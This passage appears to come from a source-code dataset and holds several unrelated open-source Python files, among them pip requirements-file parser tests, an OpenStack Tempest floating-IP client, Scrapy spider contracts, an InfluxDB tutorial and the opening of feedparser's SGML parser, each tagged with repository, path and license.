('SomeProject --hash=sha256:2cf24dba5fb0a30e26e83b2ac5b9e29e1b1' '61e5c1fa7425e73043362938b9824 ' '--hash=sha384:59e1748777448c69de6b800d7a33bbfb9ff1b463e44354c' '3553bcdb9c666fa90125a3c79f90397bdf5f6a13de828684f ' '--hash=sha256:486ea46224d1bb4fb680f34f7c9ad96a8f24ec88be73ea8' 'e5a6c65260e9cb8a7') filename = 'filename' req = list(process_line(line, filename, 1))[0] assert req.options == {'hashes': { 'sha256': ['2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e730433' '62938b9824', '486ea46224d1bb4fb680f34f7c9ad96a8f24ec88be73ea8e5a6c65' '260e9cb8a7'], 'sha384': ['59e1748777448c69de6b800d7a33bbfb9ff1b463e44354c3553bcd' 'b9c666fa90125a3c79f90397bdf5f6a13de828684f']}} def test_set_isolated(self, options): line = 'SomeProject' filename = 'filename' options.isolated_mode = True result = process_line(line, filename, 1, options=options) assert list(result)[0].isolated def test_set_default_vcs(self, options): url = 'https://url#egg=SomeProject' line = '-e %s' % url filename = 'filename' options.default_vcs = 'git' result = process_line(line, filename, 1, options=options) assert list(result)[0].link.url == 'git+' + url def test_set_finder_no_index(self, finder): list(process_line("--no-index", "file", 1, finder=finder)) assert finder.index_urls == [] def test_set_finder_index_url(self, finder): list(process_line("--index-url=url", "file", 1, finder=finder)) assert finder.index_urls == ['url'] def test_set_finder_find_links(self, finder): list(process_line("--find-links=url", "file", 1, finder=finder)) assert finder.find_links == ['url'] def test_set_finder_extra_index_urls(self, finder): list(process_line("--extra-index-url=url", "file", 1, finder=finder)) assert finder.index_urls == ['url'] def test_set_finder_use_wheel(self, finder): list(process_line("--use-wheel", "file", 1, finder=finder)) no_use_wheel_fmt = pip.index.FormatControl(set(), set()) assert finder.format_control == no_use_wheel_fmt def test_set_finder_no_use_wheel(self, finder): list(process_line("--no-use-wheel", "file", 1, finder=finder)) no_use_wheel_fmt = pip.index.FormatControl(set([':all:']), set()) assert finder.format_control == no_use_wheel_fmt def test_set_finder_trusted_host(self, finder): list(process_line("--trusted-host=url", "file", 1, finder=finder)) assert finder.secure_origins == [('*', 'url', '*')] def test_noop_always_unzip(self, finder): # noop, but confirm it can be set list(process_line("--always-unzip", "file", 1, finder=finder)) def test_noop_finder_no_allow_unsafe(self, finder): # noop, but confirm it can be set list(process_line("--no-allow-insecure", "file", 1, finder=finder)) def test_set_finder_allow_all_prereleases(self, finder): list(process_line("--pre", "file", 1, finder=finder)) assert finder.allow_all_prereleases def test_relative_local_find_links(self, finder, monkeypatch): """ Test a relative find_links path is joined with the req file directory """ # Make sure the test also passes on windows req_file = os.path.normcase(os.path.abspath( os.path.normpath('/path/req_file.txt'))) nested_link = os.path.normcase(os.path.abspath( os.path.normpath('/path/rel_path'))) exists_ = os.path.exists def exists(path): if path == nested_link: return True else: exists_(path) monkeypatch.setattr(os.path, 'exists', exists) list(process_line("--find-links=rel_path", req_file, 1, finder=finder)) assert finder.find_links == [nested_link] def test_relative_http_nested_req_files(self, finder, monkeypatch): """ Test a relative nested req file path is joined with the req file url """ req_file = 'http://me.com/me/req_file.txt' def parse(*args, **kwargs): return iter([]) mock_parse = Mock() mock_parse.side_effect = parse monkeypatch.setattr(pip.req.req_file, 'parse_requirements', mock_parse) list(process_line("-r reqs.txt", req_file, 1, finder=finder)) call = mock_parse.mock_calls[0] assert call[1][0] == 'http://me.com/me/reqs.txt' def test_relative_local_nested_req_files(self, finder, monkeypatch): """ Test a relative nested req file path is joined with the req file dir """ req_file = os.path.normpath('/path/req_file.txt') def parse(*args, **kwargs): return iter([]) mock_parse = Mock() mock_parse.side_effect = parse monkeypatch.setattr(pip.req.req_file, 'parse_requirements', mock_parse) list(process_line("-r reqs.txt", req_file, 1, finder=finder)) call = mock_parse.mock_calls[0] assert call[1][0] == os.path.normpath('/path/reqs.txt') def test_absolute_local_nested_req_files(self, finder, monkeypatch): """ Test an absolute nested req file path """ req_file = '/path/req_file.txt' def parse(*args, **kwargs): return iter([]) mock_parse = Mock() mock_parse.side_effect = parse monkeypatch.setattr(pip.req.req_file, 'parse_requirements', mock_parse) list(process_line("-r /other/reqs.txt", req_file, 1, finder=finder)) call = mock_parse.mock_calls[0] assert call[1][0] == '/other/reqs.txt' def test_absolute_http_nested_req_file_in_local(self, finder, monkeypatch): """ Test a nested req file url in a local req file """ req_file = '/path/req_file.txt' def parse(*args, **kwargs): return iter([]) mock_parse = Mock() mock_parse.side_effect = parse monkeypatch.setattr(pip.req.req_file, 'parse_requirements', mock_parse) list(process_line("-r http://me.com/me/reqs.txt", req_file, 1, finder=finder)) call = mock_parse.mock_calls[0] assert call[1][0] == 'http://me.com/me/reqs.txt' def test_set_finder_process_dependency_links(self, finder): list(process_line( "--process-dependency-links", "file", 1, finder=finder)) assert finder.process_dependency_links class TestBreakOptionsArgs(object): def test_no_args(self): assert ('', '--option') == break_args_options('--option') def test_no_options(self): assert ('arg arg', '') == break_args_options('arg arg') def test_args_short_options(self): result = break_args_options('arg arg -s') assert ('arg arg', '-s') == result def test_args_long_options(self): result = break_args_options('arg arg --long') assert ('arg arg', '--long') == result class TestOptionVariants(object): # this suite is really just testing optparse, but added it anyway def test_variant1(self, finder): list(process_line("-i url", "file", 1, finder=finder)) assert finder.index_urls == ['url'] def test_variant2(self, finder): list(process_line("-i 'url'", "file", 1, finder=finder)) assert finder.index_urls == ['url'] def test_variant3(self, finder): list(process_line("--index-url=url", "file", 1, finder=finder)) assert finder.index_urls == ['url'] def test_variant4(self, finder): list(process_line("--index-url url", "file", 1, finder=finder)) assert finder.index_urls == ['url'] def test_variant5(self, finder): list(process_line("--index-url='url'", "file", 1, finder=finder)) assert finder.index_urls == ['url'] class TestParseRequirements(object): """tests for `parse_requirements`""" @pytest.mark.network def test_remote_reqs_parse(self): """ Test parsing a simple remote requirements file """ # this requirements file just contains a comment previously this has # failed in py3: https://github.com/pypa/pip/issues/760 for req in parse_requirements( 'https://raw.githubusercontent.com/pypa/' 'pip-test-package/master/' 'tests/req_just_comment.txt', session=PipSession()): pass def test_multiple_appending_options(self, tmpdir, finder, options): with open(tmpdir.join("req1.txt"), "w") as fp: fp.write("--extra-index-url url1 \n") fp.write("--extra-index-url url2 ") list(parse_requirements(tmpdir.join("req1.txt"), finder=finder, session=PipSession(), options=options)) assert finder.index_urls == ['url1', 'url2'] def test_skip_regex(self, tmpdir, finder, options): options.skip_requirements_regex = '.*Bad.*' with open(tmpdir.join("req1.txt"), "w") as fp: fp.write("--extra-index-url Bad \n") fp.write("--extra-index-url Good ") list(parse_requirements(tmpdir.join("req1.txt"), finder=finder, options=options, session=PipSession())) assert finder.index_urls == ['Good'] def test_join_lines(self, tmpdir, finder): with open(tmpdir.join("req1.txt"), "w") as fp: fp.write("--extra-index-url url1 \\\n--extra-index-url url2") list(parse_requirements(tmpdir.join("req1.txt"), finder=finder, session=PipSession())) assert finder.index_urls == ['url1', 'url2'] def test_req_file_parse_no_only_binary(self, data, finder): list(parse_requirements( data.reqfiles.join("supported_options2.txt"), finder, session=PipSession())) expected = pip.index.FormatControl(set(['fred']), set(['wilma'])) assert finder.format_control == expected def test_req_file_parse_comment_start_of_line(self, tmpdir, finder): """ Test parsing comments in a requirements file """ with open(tmpdir.join("req1.txt"), "w") as fp: fp.write("# Comment ") reqs = list(parse_requirements(tmpdir.join("req1.txt"), finder, session=PipSession())) assert not reqs def test_req_file_parse_comment_end_of_line_with_url(self, tmpdir, finder): """ Test parsing comments in a requirements file """ with open(tmpdir.join("req1.txt"), "w") as fp: fp.write("https://example.com/foo.tar.gz # Comment ") reqs = list(parse_requirements(tmpdir.join("req1.txt"), finder, session=PipSession())) assert len(reqs) == 1 assert reqs[0].link.url == "https://example.com/foo.tar.gz" def test_req_file_parse_egginfo_end_of_line_with_url(self, tmpdir, finder): """ Test parsing comments in a requirements file """ with open(tmpdir.join("req1.txt"), "w") as fp: fp.write("https://example.com/foo.tar.gz#egg=wat") reqs = list(parse_requirements(tmpdir.join("req1.txt"), finder, session=PipSession())) assert len(reqs) == 1 assert reqs[0].name == "wat" def test_req_file_no_finder(self, tmpdir): """ Test parsing a requirements file without a finder """ with open(tmpdir.join("req.txt"), "w") as fp: fp.write(""" --find-links https://example.com/ --index-url https://example.com/ --extra-index-url https://two.example.com/ --no-use-wheel --no-index """) parse_requirements(tmpdir.join("req.txt"), session=PipSession()) def test_install_requirements_with_options(self, tmpdir, finder, session, options): global_option = '--dry-run' install_option = '--prefix=/opt' content = ''' --only-binary :all: INITools==2.0 --global-option="{global_option}" \ --install-option "{install_option}" '''.format(global_option=global_option, install_option=install_option) with requirements_file(content, tmpdir) as reqs_file: req = next(parse_requirements(reqs_file.abspath, finder=finder, options=options, session=session)) req.source_dir = os.curdir with patch.object(subprocess, 'Popen') as popen: popen.return_value.stdout.readline.return_value = "" try: req.install([]) except: pass call = popen.call_args_list[0][0][0] assert call.index(install_option) > \ call.index('install') > \ call.index(global_option) > 0 assert options.format_control.no_binary == set([':all:']) assert options.format_control.only_binary == set([])
mit
cisco-openstack/tempest
tempest/lib/services/compute/floating_ips_client.py
2
4648
# Copyright 2012 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo_serialization import jsonutils as json from six.moves.urllib import parse as urllib from tempest.lib.api_schema.response.compute.v2_1 import floating_ips as schema from tempest.lib.common import rest_client from tempest.lib import exceptions as lib_exc from tempest.lib.services.compute import base_compute_client class FloatingIPsClient(base_compute_client.BaseComputeClient): def list_floating_ips(self, **params): """Returns a list of all floating IPs filtered by any parameters. For a full list of available parameters, please refer to the official API reference: https://docs.openstack.org/api-ref/compute/#list-floating-ip-addresses """ url = 'os-floating-ips' if params: url += '?%s' % urllib.urlencode(params) resp, body = self.get(url) body = json.loads(body) self.validate_response(schema.list_floating_ips, resp, body) return rest_client.ResponseBody(resp, body) def show_floating_ip(self, floating_ip_id): """Get the details of a floating IP. For a full list of available parameters, please refer to the official API reference: https://docs.openstack.org/api-ref/compute/#show-floating-ip-address-details """ url = "os-floating-ips/%s" % floating_ip_id resp, body = self.get(url) body = json.loads(body) self.validate_response(schema.create_get_floating_ip, resp, body) return rest_client.ResponseBody(resp, body) def create_floating_ip(self, **kwargs): """Allocate a floating IP to the project. For a full list of available parameters, please refer to the official API reference: https://docs.openstack.org/api-ref/compute/#create-allocate-floating-ip-address """ url = 'os-floating-ips' post_body = json.dumps(kwargs) resp, body = self.post(url, post_body) body = json.loads(body) self.validate_response(schema.create_get_floating_ip, resp, body) return rest_client.ResponseBody(resp, body) def delete_floating_ip(self, floating_ip_id): """Deletes the provided floating IP from the project. For a full list of available parameters, please refer to the official API reference: https://docs.openstack.org/api-ref/compute/#delete-deallocate-floating-ip-address """ url = "os-floating-ips/%s" % floating_ip_id resp, body = self.delete(url) self.validate_response(schema.add_remove_floating_ip, resp, body) return rest_client.ResponseBody(resp, body) def associate_floating_ip_to_server(self, floating_ip, server_id): """Associate the provided floating IP to a specific server.""" url = "servers/%s/action" % server_id post_body = { 'addFloatingIp': { 'address': floating_ip, } } post_body = json.dumps(post_body) resp, body = self.post(url, post_body) self.validate_response(schema.add_remove_floating_ip, resp, body) return rest_client.ResponseBody(resp, body) def disassociate_floating_ip_from_server(self, floating_ip, server_id): """Disassociate the provided floating IP from a specific server.""" url = "servers/%s/action" % server_id post_body = { 'removeFloatingIp': { 'address': floating_ip, } } post_body = json.dumps(post_body) resp, body = self.post(url, post_body) self.validate_response(schema.add_remove_floating_ip, resp, body) return rest_client.ResponseBody(resp, body) def is_resource_deleted(self, id): try: self.show_floating_ip(id) except lib_exc.NotFound: return True return False @property def resource_type(self): """Returns the primary type of resource this client works with.""" return 'floating_ip'
apache-2.0
cluckmaster/MissionPlanner
LogAnalyzer/tests/TestCompass.py
140
6039
from LogAnalyzer import Test,TestResult import DataflashLog import math class TestCompass(Test): '''test for compass offsets and throttle interference''' def __init__(self): Test.__init__(self) self.name = "Compass" def run(self, logdata, verbose): self.result = TestResult() self.result.status = TestResult.StatusType.GOOD def vec_len(x): return math.sqrt(x[0]**2+x[1]**2+x[2]**2) def FAIL(): self.result.status = TestResult.StatusType.FAIL def WARN(): if self.result.status != TestResult.StatusType.FAIL: self.result.status = TestResult.StatusType.WARN try: warnOffset = 300 failOffset = 500 param_offsets = ( logdata.parameters["COMPASS_OFS_X"], logdata.parameters["COMPASS_OFS_Y"], logdata.parameters["COMPASS_OFS_Z"] ) if vec_len(param_offsets) > failOffset: FAIL() self.result.statusMessage = "FAIL: Large compass offset params (X:%.2f, Y:%.2f, Z:%.2f)\n" % (param_offsets[0],param_offsets[1],param_offsets[2]) elif vec_len(param_offsets) > warnOffset: WARN() self.result.statusMessage = "WARN: Large compass offset params (X:%.2f, Y:%.2f, Z:%.2f)\n" % (param_offsets[0],param_offsets[1],param_offsets[2]) if "MAG" in logdata.channels: max_log_offsets = zip( map(lambda x: x[1],logdata.channels["MAG"]["OfsX"].listData), map(lambda x: x[1],logdata.channels["MAG"]["OfsY"].listData), map(lambda x: x[1],logdata.channels["MAG"]["OfsZ"].listData) ) max_log_offsets = reduce(lambda x,y: x if vec_len(x) > vec_len(y) else y, max_log_offsets) if vec_len(max_log_offsets) > failOffset: FAIL() self.result.statusMessage += "FAIL: Large compass offset in MAG data (X:%.2f, Y:%.2f, Z:%.2f)\n" % (max_log_offsets[0],max_log_offsets[1],max_log_offsets[2]) elif vec_len(max_log_offsets) > warnOffset: WARN() self.result.statusMessage += "WARN: Large compass offset in MAG data (X:%.2f, Y:%.2f, Z:%.2f)\n" % (max_log_offsets[0],max_log_offsets[1],max_log_offsets[2]) # check for mag field length change, and length outside of recommended range if "MAG" in logdata.channels: percentDiffThresholdWARN = 0.25 percentDiffThresholdFAIL = 0.35 minMagFieldThreshold = 120.0 maxMagFieldThreshold = 550.0 index = 0 length = len(logdata.channels["MAG"]["MagX"].listData) magField = [] (minMagField, maxMagField) = (None,None) (minMagFieldLine, maxMagFieldLine) = (None,None) zerosFound = False while index<length: mx = logdata.channels["MAG"]["MagX"].listData[index][1] my = logdata.channels["MAG"]["MagY"].listData[index][1] mz = logdata.channels["MAG"]["MagZ"].listData[index][1] if ((mx==0) and (my==0) and (mz==0)): # sometimes they're zero, not sure why, same reason as why we get NaNs as offsets? zerosFound = True else: mf = math.sqrt(mx*mx + my*my + mz*mz) magField.append(mf) if mf<minMagField: minMagField = mf minMagFieldLine = logdata.channels["MAG"]["MagX"].listData[index][0] if mf>maxMagField: maxMagField = mf maxMagFieldLine = logdata.channels["MAG"]["MagX"].listData[index][0] if index == 0: (minMagField, maxMagField) = (mf,mf) index += 1 percentDiff = (maxMagField-minMagField) / minMagField if percentDiff > percentDiffThresholdFAIL: FAIL() self.result.statusMessage = self.result.statusMessage + "Large change in mag_field (%.2f%%)\n" % (percentDiff*100) elif percentDiff > percentDiffThresholdWARN: WARN() self.result.statusMessage = self.result.statusMessage + "Moderate change in mag_field (%.2f%%)\n" % (percentDiff*100) else: self.result.statusMessage = self.result.statusMessage + "mag_field interference within limits (%.2f%%)\n" % (percentDiff*100) if minMagField < minMagFieldThreshold: self.result.statusMessage = self.result.statusMessage + "Min mag field length (%.2f) < recommended (%.2f)\n" % (minMagField,minMagFieldThreshold) if maxMagField > maxMagFieldThreshold: self.result.statusMessage = self.result.statusMessage + "Max mag field length (%.2f) > recommended (%.2f)\n" % (maxMagField,maxMagFieldThreshold) if zerosFound: WARN() self.result.statusMessage = self.result.statusMessage + "All zeros found in MAG X/Y/Z log data\n" if verbose: self.result.statusMessage = self.result.statusMessage + "Min mag_field of %.2f on line %d\n" % (minMagField,minMagFieldLine) self.result.statusMessage = self.result.statusMessage + "Max mag_field of %.2f on line %d\n" % (maxMagField,maxMagFieldLine) else: self.result.statusMessage = self.result.statusMessage + "No MAG data, unable to test mag_field interference\n" except KeyError as e: self.result.status = TestResult.StatusType.FAIL self.result.statusMessage = str(e) + ' not found'
gpl-3.0
catapult-project/catapult
telemetry/telemetry/util/image_util.py
3
4042
# Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Provides implementations of basic image processing functions. Implements basic image processing functions, such as reading/writing images, cropping, finding the bounding box of a color and diffing images. When numpy is present, image_util_numpy_impl is used for the implementation of this interface. The old bitmap implementation (image_util_bitmap_impl) is used as a fallback when numpy is not present.""" # pylint: disable=wrong-import-position from __future__ import absolute_import import base64 from telemetry.internal.util import external_modules np = external_modules.ImportOptionalModule('numpy') if np is None: from telemetry.internal.image_processing import image_util_bitmap_impl impl = image_util_bitmap_impl else: from telemetry.internal.image_processing import image_util_numpy_impl impl = image_util_numpy_impl # pylint: enable=wrong-import-position def Channels(image): """Number of color channels in the image.""" return impl.Channels(image) def Width(image): """Width of the image.""" return impl.Width(image) def Height(image): """Height of the image.""" return impl.Height(image) def Pixels(image): """Flat RGB pixel array of the image.""" return impl.Pixels(image) def GetPixelColor(image, x, y): """Returns a RgbaColor for the pixel at (x, y).""" return impl.GetPixelColor(image, x, y) def WritePngFile(image, path): """Write an image to a PNG file. Args: image: an image object. path: The path to the PNG file. Must end in 'png' or an AssertionError will be raised.""" assert path.endswith('png') return impl.WritePngFile(image, path) def FromRGBPixels(width, height, pixels, bpp=3): """Create an image from an array of rgb pixels. Ignores alpha channel if present. Args: width, height: int, the width and height of the image. pixels: The flat array of pixels in the form of [r,g,b[,a],r,g,b[,a],...] bpp: 3 for RGB, 4 for RGBA.""" return impl.FromRGBPixels(width, height, pixels, bpp) def FromPng(png_data): """Create an image from raw PNG data.""" return impl.FromPng(png_data) def FromPngFile(path): """Create an image from a PNG file. Args: path: The path to the PNG file.""" return impl.FromPngFile(path) def FromBase64Png(base64_png): """Create an image from raw PNG data encoded in base64.""" return FromPng(base64.b64decode(base64_png)) def AreEqual(image1, image2, tolerance=0, likely_equal=True): """Determines whether two images are identical within a given tolerance. Setting likely_equal to False enables short-circuit equality testing, which is about 2-3x slower for equal images, but can be image height times faster if the images are not equal.""" return impl.AreEqual(image1, image2, tolerance, likely_equal) def Diff(image1, image2): """Returns a new image that represents the difference between this image and another image.""" return impl.Diff(image1, image2) def GetBoundingBox(image, color, tolerance=0): """Finds the minimum box surrounding all occurrences of bgr |color|. Ignores the alpha channel. Args: color: RbgaColor, bounding box color. tolerance: int, per-channel tolerance for the bounding box color. Returns: (top, left, width, height), match_count""" return impl.GetBoundingBox(image, color, tolerance) def Crop(image, left, top, width, height): """Crops the current image down to the specified box.""" return impl.Crop(image, left, top, width, height) def GetColorHistogram(image, ignore_color=None, tolerance=0): """Computes a histogram of the pixel colors in this image. Args: ignore_color: An RgbaColor to exclude from the bucket counts. tolerance: A tolerance for the ignore_color. Returns: A ColorHistogram namedtuple with 256 integers in each field: r, g, and b.""" return impl.GetColorHistogram(image, ignore_color, tolerance)
bsd-3-clause
bjorand/influxdb-python
examples/tutorial.py
9
1778
import argparse from influxdb import InfluxDBClient def main(host='localhost', port=8086): user = 'root' password = 'root' dbname = 'example' dbuser = 'smly' dbuser_password = 'my_secret_password' query = 'select value from cpu_load_short;' json_body = [ { "measurement": "cpu_load_short", "tags": { "host": "server01", "region": "us-west" }, "time": "2009-11-10T23:00:00Z", "fields": { "value": 0.64 } } ] client = InfluxDBClient(host, port, user, password, dbname) print("Create database: " + dbname) client.create_database(dbname) print("Create a retention policy") client.create_retention_policy('awesome_policy', '3d', 3, default=True) print("Switch user: " + dbuser) client.switch_user(dbuser, dbuser_password) print("Write points: {0}".format(json_body)) client.write_points(json_body) print("Queying data: " + query) result = client.query(query) print("Result: {0}".format(result)) print("Switch user: " + user) client.switch_user(user, password) print("Drop database: " + dbname) client.drop_database(dbname) def parse_args(): parser = argparse.ArgumentParser( description='example code to play with InfluxDB') parser.add_argument('--host', type=str, required=False, default='localhost', help='hostname of InfluxDB http API') parser.add_argument('--port', type=int, required=False, default=8086, help='port of InfluxDB http API') return parser.parse_args() if __name__ == '__main__': args = parse_args() main(host=args.host, port=args.port)
mit
famorted/scrapy
scrapy/contracts/default.py
153
2334
from scrapy.item import BaseItem from scrapy.http import Request from scrapy.exceptions import ContractFail from . import Contract # contracts class UrlContract(Contract): """ Contract to set the url of the request (mandatory) @url http://scrapy.org """ name = 'url' def adjust_request_args(self, args): args['url'] = self.args[0] return args class ReturnsContract(Contract): """ Contract to check the output of a callback general form: @returns request(s)/item(s) [min=1 [max]] e.g.: @returns request @returns request 2 @returns request 2 10 @returns request 0 10 """ name = 'returns' objects = { 'request': Request, 'requests': Request, 'item': (BaseItem, dict), 'items': (BaseItem, dict), } def __init__(self, *args, **kwargs): super(ReturnsContract, self).__init__(*args, **kwargs) assert len(self.args) in [1, 2, 3] self.obj_name = self.args[0] or None self.obj_type = self.objects[self.obj_name] try: self.min_bound = int(self.args[1]) except IndexError: self.min_bound = 1 try: self.max_bound = int(self.args[2]) except IndexError: self.max_bound = float('inf') def post_process(self, output): occurrences = 0 for x in output: if isinstance(x, self.obj_type): occurrences += 1 assertion = (self.min_bound <= occurrences <= self.max_bound) if not assertion: if self.min_bound == self.max_bound: expected = self.min_bound else: expected = '%s..%s' % (self.min_bound, self.max_bound) raise ContractFail("Returned %s %s, expected %s" % \ (occurrences, self.obj_name, expected)) class ScrapesContract(Contract): """ Contract to check presence of fields in scraped items @scrapes page_name page_body """ name = 'scrapes' def post_process(self, output): for x in output: if isinstance(x, (BaseItem, dict)): for arg in self.args: if not arg in x: raise ContractFail("'%s' field is missing" % arg)
bsd-3-clause
rentongzhang/servo
tests/wpt/web-platform-tests/tools/wptserve/wptserve/wptserve.py
515
1117
#!/usr/bin/env python import argparse import os import server def abs_path(path): return os.path.abspath(path) def parse_args(): parser = argparse.ArgumentParser(description="HTTP server designed for extreme flexibility " "required in testing situations.") parser.add_argument("document_root", action="store", type=abs_path, help="Root directory to serve files from") parser.add_argument("--port", "-p", dest="port", action="store", type=int, default=8000, help="Port number to run server on") parser.add_argument("--host", "-H", dest="host", action="store", type=str, default="127.0.0.1", help="Host to run server on") return parser.parse_args() def main(): args = parse_args() httpd = server.WebTestHttpd(host=args.host, port=args.port, use_ssl=False, certificate=None, doc_root=args.document_root) httpd.start() if __name__ == "__main__": main()
mpl-2.0
jose36/jmdl2
servers/uploadstation.py
44
1300
# -*- coding: utf-8 -*- #------------------------------------------------------------ # pelisalacarta - XBMC Plugin # Conector para uploadstation # http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/ #------------------------------------------------------------ import urlparse,urllib2,urllib,re import os from core import scrapertools from core import logger from core import config def get_video_url( page_url , premium = False , user="" , password="", video_password="" ): logger.info("[uploadstation.py] get_video_url(page_url='%s')" % page_url) video_urls = [] return video_urls # Encuentra vídeos del servidor en el texto pasado def find_videos(data): encontrados = set() devuelve = [] # http://uploaded.to/file/1haty8nt patronvideos = '(http://www.uploadstation.com/file/[a-zA-Z0-9]+)' logger.info("[uploadstation.py] find_videos #"+patronvideos+"#") matches = re.compile(patronvideos,re.DOTALL).findall(data) for match in matches: titulo = "[uploadstation]" url = match if url not in encontrados: logger.info(" url="+url) devuelve.append( [ titulo , url , 'uploadstation' ] ) encontrados.add(url) else: logger.info(" url duplicada="+url) return devuelve
gpl-2.0
zaccoz/odoo
addons/crm_claim/report/__init__.py
446
1080
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import crm_claim_report # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
fbossy/SickRage
lib/feedparser/sgmllib.py
24
17770
"""A parser for SGML, using the derived class as a static DTD.""" # XXX This only supports those SGML features used by HTML. # XXX There should be a way to distinguish between PCDATA (parsed # character data -- the normal case), RCDATA (replaceable character # data -- only char and entity references and end tags are special) # and CDATA (character data -- only end tags are special). RCDATA is # not supported at all. import _markupbase import re __all__ = ["SGMLParser", "SGMLParseError"] # Regular expressions used for parsing interesting = re.compile('[&<]') incomplete = re.compile('&([a-zA-Z][a-zA-Z0-9]*|#[0-9]*)?|' '<([a-zA-Z][^<>]*|' '/([a-zA-Z][^<>]*)?|' '![^<>]*)?') entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]') charref = re.compile('&#([0-9]+)[^0-9]') starttagopen = re.compile('<[>a-zA-Z]') shorttagopen = re.compile('<[a-zA-Z][-.a-zA-Z0-9]*/') shorttag = re.compile('<([a-zA-Z][-.a-zA-Z0-9]*)/([^/]*)/') piclose = re.compile('>') endbracket = re.compile('[<>]') tagfind = re.compile('[a-zA-Z][-_.a-zA-Z0-9]*') attrfind = re.compile( r'\s*([a-zA-Z_][-:.a-zA-Z_0-9]*)(\s*=\s*' r'(\'[^\']*\'|"[^"]*"|[][\-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~\'"@]*))?') class SGMLParseError(RuntimeError): """Exception raised for all parse errors.""" pass # SGML parser base class -- find tags and call handler functions. # Usage: p = SGMLParser(); p.feed(data); ...; p.close(). # The dtd is defined by deriving a class which defines methods # with special names to handle tags: start_foo and end_foo to handle # <foo> and </foo>, respectively, or do_foo to handle <foo> by itself. # (Tags are converted to lower case for this purpose.) The data # between tags is passed to the parser by calling self.handle_data() # with some data as argument (the data may be split up in arbitrary # chunks). Entity references are passed by calling # self.handle_entityref() with the entity reference as argument. class SGMLParser(_markupbase.ParserBase): # Definition of entities -- derived classes may override entity_or_charref = re.compile('&(?:' '([a-zA-Z][-.a-zA-Z0-9]*)|#([0-9]+)' ')(;?)') def __init__(self, verbose=0): """Initialize and reset this instance.""" self.verbose = verbose self.reset() def reset(self): """Reset this instance. Loses all unprocessed data.""" self.__starttag_text = None self.rawdata = '' self.stack = [] self.lasttag = '???' self.nomoretags = 0 self.literal = 0 _markupbase.ParserBase.reset(self) def setnomoretags(self): """Enter literal mode (CDATA) till EOF. Intended for derived classes only. """ self.nomoretags = self.literal = 1 def setliteral(self, *args): """Enter literal mode (CDATA). Intended for derived classes only. """ self.literal = 1 def feed(self, data): """Feed some data to the parser. Call this as often as you want, with as little or as much text as you want (may include '\n'). (This just saves the text, all the processing is done by goahead().) """ self.rawdata = self.rawdata + data self.goahead(0) def close(self): """Handle the remaining data.""" self.goahead(1) def error(self, message): raise SGMLParseError(message) # Internal -- handle data as far as reasonable. May leave state # and data to be processed by a subsequent call. If 'end' is # true, force handling all data as if followed by EOF marker. def goahead(self, end): rawdata = self.rawdata i = 0 n = len(rawdata) while i < n: if self.nomoretags: self.handle_data(rawdata[i:n]) i = n break match = interesting.search(rawdata, i) if match: j = match.start() else: j = n if i < j: self.handle_data(rawdata[i:j]) i = j if i == n: break if rawdata[i] == '<': if starttagopen.match(rawdata, i): if self.literal: self.handle_data(rawdata[i]) i = i+1 continue k = self.parse_starttag(i) if k < 0: break i = k continue if rawdata.startswith("</", i): k = self.parse_endtag(i) if k < 0: break i = k self.literal = 0 continue if self.literal: if n > (i + 1): self.handle_data("<") i = i+1 else: # incomplete break continue if rawdata.startswith("<!--", i): # Strictly speaking, a comment is --.*-- # within a declaration tag <!...>. # This should be removed, # and comments handled only in parse_declaration. k = self.parse_comment(i) if k < 0: break i = k continue if rawdata.startswith("<?", i): k = self.parse_pi(i) if k < 0: break i = i+k continue if rawdata.startswith("<!", i): # This is some sort of declaration; in "HTML as # deployed," this should only be the document type # declaration ("<!DOCTYPE html...>"). k = self.parse_declaration(i) if k < 0: break i = k continue elif rawdata[i] == '&': if self.literal: self.handle_data(rawdata[i]) i = i+1 continue match = charref.match(rawdata, i) if match: name = match.group(1) self.handle_charref(name) i = match.end(0) if rawdata[i-1] != ';': i = i-1 continue match = entityref.match(rawdata, i) if match: name = match.group(1) self.handle_entityref(name) i = match.end(0) if rawdata[i-1] != ';': i = i-1 continue else: self.error('neither < nor & ??') # We get here only if incomplete matches but # nothing else match = incomplete.match(rawdata, i) if not match: self.handle_data(rawdata[i]) i = i+1 continue j = match.end(0) if j == n: break # Really incomplete self.handle_data(rawdata[i:j]) i = j # end while if end and i < n: self.handle_data(rawdata[i:n]) i = n self.rawdata = rawdata[i:] # XXX if end: check for empty stack # Extensions for the DOCTYPE scanner: _decl_otherchars = '=' # Internal -- parse processing instr, return length or -1 if not terminated def parse_pi(self, i): rawdata = self.rawdata if rawdata[i:i+2] != '<?': self.error('unexpected call to parse_pi()') match = piclose.search(rawdata, i+2) if not match: return -1 j = match.start(0) self.handle_pi(rawdata[i+2: j]) j = match.end(0) return j-i def get_starttag_text(self): return self.__starttag_text # Internal -- handle starttag, return length or -1 if not terminated def parse_starttag(self, i): self.__starttag_text = None start_pos = i rawdata = self.rawdata if shorttagopen.match(rawdata, i): # SGML shorthand: <tag/data/ == <tag>data</tag> # XXX Can data contain &... (entity or char refs)? # XXX Can data contain < or > (tag characters)? # XXX Can there be whitespace before the first /? match = shorttag.match(rawdata, i) if not match: return -1 tag, data = match.group(1, 2) self.__starttag_text = 